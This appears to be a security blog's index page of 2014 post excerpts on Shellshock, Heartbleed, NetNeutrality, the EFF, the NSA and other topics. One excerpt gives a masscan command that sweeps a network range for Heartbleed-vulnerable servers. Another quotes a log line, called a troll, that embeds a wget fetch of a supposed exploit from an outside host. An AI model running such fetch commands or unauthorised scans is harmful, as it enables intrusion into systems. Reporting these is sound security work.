0

Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

0

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned-books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and where Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts themselves. There are many examples, such as supporting coder's rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace Continue reading

0

Hacker “weev” has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:

Breathin' so free on non-extradition soil now. Breakup with USA is done now.
— Andrew Auernheimer (@rabite) September 14, 2014

I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn't require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don't do because of the chilling effect of government. For example, in our VNC research, we don't test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if 'weev' never intends on traveling to an extradition country, it's something he can do, and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to "free speech", Continue reading

0

Rebuttal to Volokh’s CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarianism has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to Continue reading

0

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response the to FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.

“Save NetNeutrality”

Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.

“NetNeutrality is technical”

Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort Continue reading

0

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think Continue reading

0

Masscan does STARTTLS

Just a quick note: I've updated my port-scanner masscan to support STARTTLS, including Heartbleed checks. Thus, if you scan:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed

...then it'll find not only all vulnerable SSL servers, but also vulnerable SMTP/POP3/IMAP4/FTP servers using STARTTLS.

The issue is that there are two ways unencrypted protocols can support SSL. One is to assign a new port number (like 443 instead of 80), establish the SSL connection first, then the normal protocol second within the encrypted tunnel. The second way is the method SMTP uses: it starts the normal unencrypted SMTP session, then issues the "STARTTLS" command to convert the connection to SSL, then continue with SMTP encrypted.

Here's what a scan will look like:

Banner on port 143/tcp on 198.51.100.42: [ssl] cipher:0x39 , imap.example.com  
Banner on port 143/tcp on 198.51.100.42: [vuln] SSL[heartbeat] SSL[HEARTBLEED] 
Banner on port 143/tcp on 198.51.100.42: [imap] * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5] Dovecot ready.x0a* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5x0aa001 OK Capability completed.x0aa002

Because of the --banners option, we see the normal Continue reading

0

Grow up, you babies

When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.

In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:

"somebody who tries to provoke an emotional reaction"

The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.

That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to Continue reading

0

C10M: The coming DDR4 revolution

Computer memory has been based on the same DRAM technology since the 1970s. Recent developments have been versions of the DDR technology, DDR2, DDR2, and now DDR4. The capacity and transfer speed have been doubling every couple years according to Moore's Law, but the latency has been stuck at ~70 nanoseconds for decades. The recent DDR4 standard won't fix this latency, but will give us a lot more tools to mitigate its effects.

0

That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They say logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”

0

No, the CIA didn’t spy on other computers

The computer's the CIA spied on were owned and operated by the CIA.

I thought I'd mention this detail that is usually missing from today's news about the CIA spying on Senate staffers. The Senate staffers were investigating the CIA's torture program, reviewing classified documents. The CIA didn't trust the staffers, so they setup a special computer network just for the staffers to use -- a network secured and run by the CIA itself.

The CIA, though, spied on what the staffers did on the system. This allowed the CIA to manipulate investigation. When the staffers found some particularly juicy bit of information, the CIA was able to yank it from the system and re-classify it so that the staffers couldn't use it. Before the final report was ready, the CIA was already able to set the political machine in motion to defend itself from the report.

Thus, what the CIA did was clearly corrupt and wrong. It's just that it isn't what most people understand when they read today's headlines. It wasn't a case of the CIA hacking into other people's computers.

Many stories quote CIA director Brennan who said earlier this year:

I think a lot of people Continue reading

0

Cliché: open-source is secure

Some in cybersec keep claiming that open-source is inherently more secure or trustworthy than closed-source. This is demonstrably false.

0

Everything can be a bomb

This last week, pranksters replaced the US flag on top the Brooklyn Bridge with a white-flag. Nobody knows who or why. Many in the press have linked this to terrorism, pointing out that it could've been a bomb. Not only local New York newspapers have said this, but also CNN.

Such irrational fears demonstrate how deeply we've fallen for police-state fears, where every action is perceived as a potential terrorist threat.

It could've been a bomb, of course. But what could also have been a bomb is a van full of C4 explosives driven across the bridge. There are no checkpoints at either end inspecting vehicles with bomb sniffing dogs. What also could've been a bomb is a ship full of fertilizer that, when ignited, would act as a small nuke. The point is that everything can be a bomb. Instead of using this as justification for an ever increasing police-state, we just need to accept this and live with the danger -- because this danger is, in the end, tiny. A thousand 9/11 events would still not equal cancer, for example.

I mention this because the former 9/11 commission released a new report yesterday stoking the fears of cyber-terrorism, Continue reading

0

Um, talks are frequently canceled at hacker cons

Talks are frequently canceled at hacker conventions. It's the norm. I had to cancel once because, on the flight into Vegas, a part fell off the plane forcing an emergency landing. Last weekend, I filled in at HopeX with a talk, replacing somebody else who had to cancel.

0

More fun with #TSA

That's Julian in the center waving at me to stop taking pictures. That's Michael faced away on his right

Coming back through JFK, my bag was stopped in the x-ray. The examiner shouted "bag checked", and sat and waited. And waited. Nobody came. Finally, he shunted it aside to the special bag check area. Where it sat, and sat.

There was as TSA agent standing around doing nothing, except flirting with a cute passenger standing right next to me bag. Finally, I pointed out that my bag needed to be checked, at which point he talked to the x-ray examiner, pulled it out, and checked it (I had a spray can of foot powder I bought because omg I wore my workout shoes that stink to the convention).

So, of course, I asked to see his badge, which was turned away from me, and to talk to his manager. He refused to even tell me his name, but he did get the supervisor, who confirmed his name was "Michael Vails". The manager was quite rude, looking at me in disbelief as I pointed out the guy was standing around flirting with girls instead of checking my bag. He wouldn't let Continue reading

0

Omg Hotel Pennsylvania sucks

Customer service is a tradeoff you get with price, thus I'm not terribly offended by things such as that recent terrible Comcast support call. If you don't want shitty service/product, then pay more. Often simply paying 10% more yields something vastly better.

The only problem is finding those "deals".

I'm at the HopeX conference, so to make life easier, I decided to stay at the venue, the Hotel Pennsylvania. Since it's a late booking, the price was $199 a night for an "upgraded" room. The room was horrible. It was tiny, the walls in the bathroom were crumbling as the damp seeped into the concrete, the furniture was scraped and dented, and the room's one tiny window looked out onto other rooms only 20 feet away. I could bear all that -- but the "non-smoking" room stank of smoke to the point that I couldn't fall asleep. So at 1:30am I gave up and checked out.

I went two (short) blocks down to the Hotel Affinia, which cases $224 for a room that's twice the size and "upscale": everything is nice new and pretty, and this non-smoking room doesn't smell a bit like smoke. It doesn't even smell like the Continue reading

0

EFF lies about NetNeutrality

The EFF has completely and thoroughly repudiated JP Barlow's "Declaration of Independence of Cyberspace", such as in this tweet:

TAKE ACTION: Congress is trying sneak through a dangerous amendment that will kill Net Neutrality. Call right now: https://t.co/lmObQjG49N
— EFF (@EFF) July 15, 2014

This tweet is lie. Congress can't "kill Net Neutrality" because Net Neutrality doesn't currently exist. Net Neutrality proponents don't want to maintain the status quo, but radically change the Internet, converting it from the private network it is now into a public utility, regulated by the government.

What the left-wing populists tell you about Net Neutrality is a lie. Corporations aren't doing the evil things they claim. There is no technical idea behind it like "end-to-end". Net Neutrality is just the political belief that corporations are inherently evil and that the government must run the Internet.

Internet "fast lanes" are not a bad thing. They already exist, and the Internet can't function without them. Sniff your home traffic and then traceroute every IP address your system communicates with. You'll find that 90% of you home traffic goes to a server in your local city. That's because most websites use a fast lane to the Continue reading

0

JTRIG weekend projects

The Intercept has released a page of JTRIG tools and techniques. I thought I'd comment on them.

Largely, this is a long list of small projects. Few of these projects require more than a couple lines of code, or would take an average hacker more than a weekend to accomplish.

For example, there is CHANGELING, which says "Ability to spoof any email address and send email under that identity". That's the sort of thing you'd ask as an interview question for a cybersec company. You'd expect the candidate to produce this in 20 minutes.

Some sound like big projects, but they are in fact just leveraging existing large open-source projects. A tiny amount of scripting on top of a project like OpenBTS would deliver big, scary results, such as fuzzing GSM.

I point this out because people have the misapprehension that the intelligence services have advanced "cyber-weapons". That's not true. Instead, what's going on is like Rambo stuck in a jungle with only a knife, who can fashion anything into a weapon, from twigs to rocks. That's what you see going on here: given the existing base of open-source (and closed-source) code, cyber-warriors fashion new tools with a little bit Continue reading

0

Upcoming speaking schedule

0

NSA: walk a mile in their shoes

While this is mostly a technical blog, our most popular posts deal with cyber-rights, supporting Snowden, Weev, and Swartz. Yet sometimes I appear to defend the NSA. People ask me why, so I thought I’d write up a response.

Most American schools force students to read the book To Kill a Mockingbird. It’s a great book for many reasons. Most people think it’s about racism, but it’s not – it’s about bigotry. Racism is just one of the forms of bigotry found in the book. The full message, repeated several times, is that we should get along with others by trying to understand their point of view.

Our society is improving with regards to racism, but other forms of bigotry are alive and well. Webster’s defines bigotry as: “obstinate and unreasoning attachment of one's own belief and opinions, with narrow-minded intolerance of beliefs opposed to them”. Our society praises such bigotry. Tolerance and understanding of other opinions is condemned.

People like Glenn Greenwald, Jacob Appelbaum, and others in the ‘activist’ movement are extreme bigots. There is good reason to oppose the NSA and its leaders who have egregiously mislead the public. Yet, this is still not justification for Continue reading